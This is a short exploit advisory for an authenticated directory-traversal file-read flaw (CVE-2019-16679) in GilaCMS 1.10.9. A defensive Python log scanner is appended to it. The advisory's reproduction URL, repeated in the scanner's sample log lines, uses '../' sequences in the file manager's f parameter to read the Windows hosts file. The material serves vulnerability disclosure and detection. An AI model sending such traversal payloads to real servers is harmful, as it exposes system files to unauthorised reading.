# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS  
# Google Dork: N/A  
# Date: 04-08-2019  
# Exploit Author: Sainadh Jamalpur  
# Vendor Homepage: https://github.com/GilaCMS/gila  
# Software Link: https://github.com/GilaCMS/gila  
# Version: 1.10.9  
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit  
# CVE : CVE-2019-16679  
  
*********** *Steps to reproduce the Vulnerability* *************  
  
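Log in to the application as an admin user or an equivalent user and go to the  
link below. The f parameter carries a relative path that climbs out of the  
application directory to the Windows hosts file:  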
  
http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts  
  
################################################################
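
Added example (not part of the original advisory and not GilaCMS code): a defender-side check that scans web access logs for requests to the file manager endpoint whose f value resolves above its starting directory. The log format, the sample lines and the names escapes_base and flag_requests are assumptions made for this illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

FM_ENDPOINT = "/admin/fm"  # file manager path as it appears in the advisory URL
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format assumed, not real traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2020:10:00:01 +0000] "GET /gilacms/admin/fm/?f=themes/example/index.php HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2020:10:00:07 +0000] "GET /gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '127.0.0.1 - - [01/Jan/2020:10:00:09 +0000] "GET /gilacms/admin/fm/?f=themes%2f..%252f..%252fx HTTP/1.1" 200 10',
    '127.0.0.1 - - [01/Jan/2020:10:00:12 +0000] "GET /gilacms/blog?f=../../x HTTP/1.1" 200 10',
]

def escapes_base(f_value):
    """Return True if f_value, resolved lexically, leaves its starting directory."""
    prev = None
    while prev != f_value:              # decode until stable to catch double encoding
        prev, f_value = f_value, unquote(f_value)
    path = f_value.replace("\\", "/")   # Windows accepts both separators
    if path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True                     # absolute path or drive letter
    depth = 0
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:               # climbed above the base directory
                return True
        else:
            depth += 1                  # "src.." counts as an ordinary component
    return False

def flag_requests(log_lines):
    """Return the log lines that hit the file manager with an escaping f value."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.rstrip("/").endswith(FM_ENDPOINT):
            continue
        if any(escapes_base(v) for v in parse_qs(url.query).get("f", [])):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

The same depth-counting rule can serve as a server-side guard on the f parameter, applied before any file is opened.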